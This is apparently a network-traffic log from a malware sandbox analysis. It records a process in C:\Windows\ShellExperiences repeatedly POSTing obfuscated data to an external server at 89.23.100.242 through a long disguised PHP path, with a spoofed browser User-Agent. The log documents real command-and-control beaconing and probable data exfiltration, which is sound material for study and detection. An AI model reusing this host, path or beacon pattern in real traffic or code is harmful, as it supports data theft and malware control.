                                                                                                Jan 10, 2025 07:58:36.298559904 CET2536OUTData Raw: 59 57 43 57 5b 5a 53 57 58 5b 57 56 50 5b 5b 52 55 52 5e 5a 54 5c 51 5e 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YWCW[ZSWX[WVP[[RUR^ZT\Q^RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'/2/X+.?(,)(+);+!'+('=G1>#''_!/Y.-
                                                                                                Jan 10, 2025 07:58:36.692507982 CET225INHTTP/1.1 100 Continue
                                                                                                Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 36 3a 35 38 3a 33 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 10 Jan 2025 06:58:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                72192.168.2.45003989.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:36.823646069 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:37.173472881 CET2544OUTData Raw: 5c 52 43 55 5b 59 56 52 58 5b 57 56 50 52 5b 5b 55 54 5e 5a 54 5c 51 5a 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \RCU[YVRX[WVPR[[UT^ZT\QZRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'D/",>-1+6#/*-?$X+(8\5 <3)Y92>#0'_!/Y.
                                                                                                Jan 10, 2025 07:58:37.561105013 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:37.713267088 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:37 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                73192.168.2.45004589.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:37.857400894 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2536
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:38.204751968 CET2536OUTData Raw: 59 52 46 57 5e 5f 53 57 58 5b 57 56 50 5b 5b 50 55 54 5e 5a 54 5e 51 5b 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YRFW^_SWX[WVP[[PUT^ZT^Q[RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR',1,(<%4;W?$);<[!,( +X)Y)1.;3:'_!/Y.%


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                74192.168.2.45004689.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:38.270625114 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2036
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:38.628175020 CET2036OUTData Raw: 5c 54 43 52 5b 5c 56 56 58 5b 57 56 50 5d 5b 50 55 5d 5e 5f 54 50 51 52 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \TCR[\VVX[WVP][PU]^_TPQRRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR',"$>=_>6 8*(>(('"$8+ >*%(Y$'_!/Y.1
                                                                                                Jan 10, 2025 07:58:39.107450008 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:39.236702919 CET349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:39 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 1e 39 56 20 28 2c 1e 26 2c 21 11 2c 3f 25 57 3c 30 0a 58 2a 04 2b 58 2a 0a 3c 0e 2d 2c 24 0c 22 02 39 5e 2b 22 04 56 24 12 24 52 26 27 21 59 0c 13 25 00 28 04 2d 1d 3e 03 2f 03 3f 31 0c 45 33 33 27 1d 30 03 31 53 23 59 3c 5a 3c 39 22 0c 28 22 3d 53 2d 2a 33 05 28 2c 2c 1f 24 0c 2a 57 0c 1f 26 56 36 32 25 13 21 21 29 03 24 38 38 0c 33 06 20 1c 24 3f 28 05 23 14 23 5b 2d 07 24 12 22 3e 09 02 2a 10 00 56 23 21 3c 17 3f 06 20 51 22 0d 22 50 02 30 5d 51 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989V (,&,!,?%W<0X*+X*<-,$"9^+"V$$R&'!Y%(->/?1E33'01S#Y<Z<9"("=S-*3(,,$*W&V62%!!)$883 $?(##[-$">*V#!<? Q""P0]Q0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                75192.168.2.45005089.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:38.880065918 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:39.236124992 CET2544OUTData Raw: 59 5e 46 53 5e 5d 56 56 58 5b 57 56 50 5c 5b 54 55 52 5e 5f 54 5a 51 5d 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: Y^FS^]VVX[WVP\[TUR^_TZQ]RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$.!?9<5$Z8!U<?(8]";T<U7=<:C%=/$:'_!/Y.
                                                                                                Jan 10, 2025 07:58:39.586740017 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:39.720976114 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:39 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                76192.168.2.45005889.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:39.848947048 CET507OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:58:40.205039978 CET2544OUTData Raw: 59 54 46 53 5e 5e 56 5e 58 5b 57 56 50 53 5b 56 55 54 5e 5d 54 51 51 5d 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YTFS^^V^X[WVPS[VUT^]TQQ]RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'E8W8?=+6?/\9<>?(5$<3Y):C&=0:'_!/Y.
                                                                                                Jan 10, 2025 07:58:40.664228916 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:40.798530102 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:40 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                77192.168.2.45006489.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:40.979882956 CET507OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:58:41.333189964 CET2544OUTData Raw: 59 53 46 52 5e 5e 56 5f 58 5b 57 56 50 53 5b 52 55 54 5e 5c 54 5b 51 5c 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YSFR^^V_X[WVPS[RUT^\T[Q\RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$82/<"+&\/*9V<><^?;'#$(0)<=1>8':'_!/Y.
                                                                                                Jan 10, 2025 07:58:41.724344969 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:41.962632895 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:41 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0
                                                                                                Jan 10, 2025 07:58:41.962658882 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:41 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                78192.168.2.45007089.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:42.083045959 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:42.439197063 CET2544OUTData Raw: 59 55 46 55 5e 57 56 56 58 5b 57 56 50 5c 5b 57 55 56 5e 58 54 5e 51 5d 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YUFU^WVVX[WVP\[WUV^XT^Q]RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$,1<.>>&Z-:2?[$(+4]5#Q(3*<*F%&*'_!/Y.
                                                                                                Jan 10, 2025 07:58:42.826157093 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:42.977946997 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:42 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                79192.168.2.45007789.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:43.105462074 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:43.454941034 CET2544OUTData Raw: 59 54 43 56 5b 5d 53 57 58 5b 57 56 50 53 5b 52 55 54 5e 52 54 59 51 53 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YTCV[]SWX[WVPS[RUT^RTYQSRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$/'X>>><5<,:>-')(#!'<3>?G1X&:'_!/Y.
                                                                                                Jan 10, 2025 07:58:43.857805967 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:43.984622955 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:43 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                80192.168.2.45008789.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:44.113409042 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                81192.168.2.45008889.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:44.258855104 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2024
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:44.610959053 CET2024OUTData Raw: 5c 52 46 54 5e 5a 56 56 58 5b 57 56 50 5b 5b 56 55 5c 5e 53 54 50 51 5d 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \RFT^ZVVX[WVP[[VU\^STPQ]RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'810<[2+&+/.?,++75$<3(+<)&$0'_!/Y.=
                                                                                                Jan 10, 2025 07:58:45.209795952 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:45.209866047 CET349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:44 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 1e 39 1f 37 2b 3c 1f 26 3f 35 56 2d 3f 39 57 2b 0e 37 06 29 3e 34 01 3e 0d 28 0c 2d 06 34 0f 21 28 21 58 2b 0c 3d 0a 26 2c 24 1e 25 37 21 59 0c 13 25 03 28 39 2d 51 3d 3a 0a 5b 2b 1f 2d 19 24 33 20 03 24 2d 21 18 37 06 38 5c 3e 2a 3d 19 2a 22 3a 0e 2e 07 05 03 28 3c 2c 1e 27 36 2a 57 0c 1f 26 10 35 1c 25 50 36 1c 3a 5c 30 2b 3b 54 24 16 06 55 32 11 3f 13 37 03 20 03 2c 2a 3b 00 22 00 0e 11 28 3e 25 0a 35 0c 3c 52 29 3c 20 51 22 0d 22 50 02 30 5d 51 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 9897+<&?5V-?9W+7)>4>(-4!(!X+=&,$%7!Y%(9-Q=:[+-$3 $-!78\>*=*":.(<,'6*W&5%P6:\0+;T$U2?7 ,*;"(>%5<R)< Q""P0]Q0
                                                                                                Jan 10, 2025 07:58:45.209893942 CET349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:44 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 1e 39 1f 37 2b 3c 1f 26 3f 35 56 2d 3f 39 57 2b 0e 37 06 29 3e 34 01 3e 0d 28 0c 2d 06 34 0f 21 28 21 58 2b 0c 3d 0a 26 2c 24 1e 25 37 21 59 0c 13 25 03 28 39 2d 51 3d 3a 0a 5b 2b 1f 2d 19 24 33 20 03 24 2d 21 18 37 06 38 5c 3e 2a 3d 19 2a 22 3a 0e 2e 07 05 03 28 3c 2c 1e 27 36 2a 57 0c 1f 26 10 35 1c 25 50 36 1c 3a 5c 30 2b 3b 54 24 16 06 55 32 11 3f 13 37 03 20 03 2c 2a 3b 00 22 00 0e 11 28 3e 25 0a 35 0c 3c 52 29 3c 20 51 22 0d 22 50 02 30 5d 51 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 9897+<&?5V-?9W+7)>4>(-4!(!X+=&,$%7!Y%(9-Q=:[+-$3 $-!78\>*=*":.(<,'6*W&5%P6:\0+;T$U2?7 ,*;"(>%5<R)< Q""P0]Q0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                82192.168.2.45008989.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:44.380027056 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
